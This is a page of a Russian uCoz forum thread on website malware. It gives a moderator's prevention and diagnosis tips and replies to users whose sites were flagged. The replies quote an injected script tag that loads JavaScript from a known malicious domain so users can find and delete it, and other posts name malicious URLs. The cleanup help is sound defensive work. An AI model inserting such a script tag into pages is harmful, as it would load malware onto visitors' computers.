Страница 2 из 146«1234145146»
Модератор форума: webanet 
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    $Vladimir$
    $SUPPORT$
    Сообщений: 6105
    Репутация: 970

    Сообщение # 16 | 15:06:38
    camper93reg, hХХp://i1ii. ru/1.js (проверка по базе вредоносных веб-адресов)

    http://yandex.ru/infected?url=css-our.ru

    camper93reg
    Сообщений: 120
    Репутация: 31

    Сообщение # 17 | 22:10:29
    ну нашел, удалил, можете посмотреть заходит нет?

    Помог? ставь +'uk к репке )))
    webanet
    Личный менеджер
    Сообщений: 23043
    Репутация: 4867

    Сообщение # 18 | 22:14:05
    camper93reg, вот тут смотрят снялось или нет http://yandex.ru/yandsea....&lr=213 и сразу оно не снимается. ждать надо перепроверки. в вебмастере надо нажать на перепроверку и ждать

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    camper93reg
    Сообщений: 120
    Репутация: 31

    Сообщение # 19 | 04:02:01
    webanet, а ну норм, я изначально так и сделал спасибо))

    Помог? ставь +'uk к репке )))
    Маркелов
    Сообщений: 41
    Репутация: 9

    Сообщение # 20 | 07:22:13
    При загрузке юкозовских сайтов антивирусник выдает сообщение:

    Объект: gоlink1.ru9.biz/js/bаck.php?id=43
    Угроза: HTML/ScrInject.B.Gen вирус
    Информация: соединение прервано - изолирован

    Сайты отображаются некорректно. Что это? Спасибо

    Сообщение отредактировал Маркелов - Суббота, 18 Май 2013, 07:26:37
    gserg
    Сообщений: 4
    Репутация: 0

    Сообщение # 21 | 11:31:03
    У меня проблема с сайтом. Во всех ява файлах, у меня их не много штуки 4, бы добавлен
    вредноносный код, в итоге заблочили сайт (Malware). Проверил, логи в порядке. Почисти файлы, поменял пароли, настройки, восстановил старый шаблон.
    Аккаунт разблокировали, но через пол дня снова заблокировали. Снова проверил файлы , все нормально. На сайте пишет "запрос отправлен в службу поддержки".
    Каждый месяц оплачиваю базовый пакет.
    Плиз помогите!
    Сообщение отредактировал gserg - Суббота, 18 Май 2013, 11:34:40
    sek001
    Сообщений: 2
    Репутация: 0

    Сообщение # 22 | 12:58:35
    пожалуйста помогите, сегодня захожу на свой сайт ligaprikolov.3dn.ru через браузер GoogleChrome и мне выдает: "Опасность: обнаружено вредоносное ПО!
    Google Chrome заблокировал доступ к этой странице на сайте ligaprikolov.3dn.ru.
    На эту веб-страницу было вставлено содержание с oneiclick.net, известного распространителя вредоносного ПО. Ее посещение может привести к заражению вашего компьютера вредоносным ПО.
    Вредоносное ПО – это программное обеспечение, специально созданное для совершения преступных действий, например хищения идентификационных данных, кражи денег или безвозвратного удаления файлов."
    При этом браузер яндекс и опера ничего такого не выдает антивирусник касперский кристал тоже никак не реагирует, на сайт рекламу и т.п. не устанавливал т.к. еще меньше месяца как запустил. Подскажите в чем может быть проблема?
    webanet
    Личный менеджер
    Сообщений: 23043
    Репутация: 4867

    Сообщение # 23 | 13:13:30
    sek001, панель управления - дизайн -управление дизайном - быстрая замена - в поле что заменить вставляете скрипт

    Цитата
    <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>
    - поле на что заменить оставляете пустым и производите замену во всех модулях

    после очистки обязательно меняете пароль uid профиля, которым администрируете сайт

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    uni_folio
    Сообщений: 12
    Репутация: 0

    Сообщение # 24 | 13:14:23
    Цитата Маркелов
    Объект: gоlink1.ru9.biz/js/bаck.php?id=43 Угроза: HTML/ScrInject.B.Gen вирус Информация: соединение прервано - изолирован

    Аналогичная ситуация и на моих сайтах
    http://sadvinograd.ucoz.ua/
    http://tkachev.ucoz.ua/
    Пользуюсь антивирусом НОД32, база данных обновлялась вчера в автоматическом режиме, сегодня в ручном.
    Прикрепления: 4966244.jpg(11Kb)

    webanet
    Личный менеджер
    Сообщений: 23043
    Репутация: 4867

    Сообщение # 25 | 13:17:48
    uni_folio, по сайту http://sadvinograd.ucoz.ua/

    панель управления - дизайн -управление дизайном - быстрая замена - в поле что заменить вставляете скрипт

    Код
    <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>

    - поле на что заменить оставляете пустым и производите замену во всех модулях

    после очистки обязательно меняете пароль uid профиля, которым администрируете сайт

    по второму сайту тоже самое

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    sek001
    Сообщений: 2
    Репутация: 0

    Сообщение # 26 | 13:57:25
    webanet спасибо))) помогло))) а из-за чего сайты так заражаются? вроде мой сайт даже в поисковиках еще не зарегистрирован)
    webanet
    Личный менеджер
    Сообщений: 23043
    Репутация: 4867

    Сообщение # 27 | 14:03:11
    sek001, смените uid пароль

    пароли ваши утекли

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    gserg
    Сообщений: 4
    Репутация: 0

    Сообщение # 28 | 16:04:30
    Кто поможет ? Сайт http://christians.ucoz.ua/
    Сообщение отредактировал gserg - Суббота, 18 Май 2013, 16:04:52
    webanet
    Личный менеджер
    Сообщений: 23043
    Репутация: 4867

    Сообщение # 29 | 16:06:28
    gserg, только тех.поддержка. сюда бессмысленно писать с блокнутыми сайтами

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    gserg
    Сообщений: 4
    Репутация: 0

    Сообщение # 30 | 16:11:47
    webanet,
    Аккаунт разблокировали, и на почту пришло от тех.поддержки что разблок. но через пол дня снова заблокировали. На сайте пишет "запрос отправлен в службу поддержки".
    Как еще с ними связаться?
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Страница 2 из 146«1234145146»
    Поиск: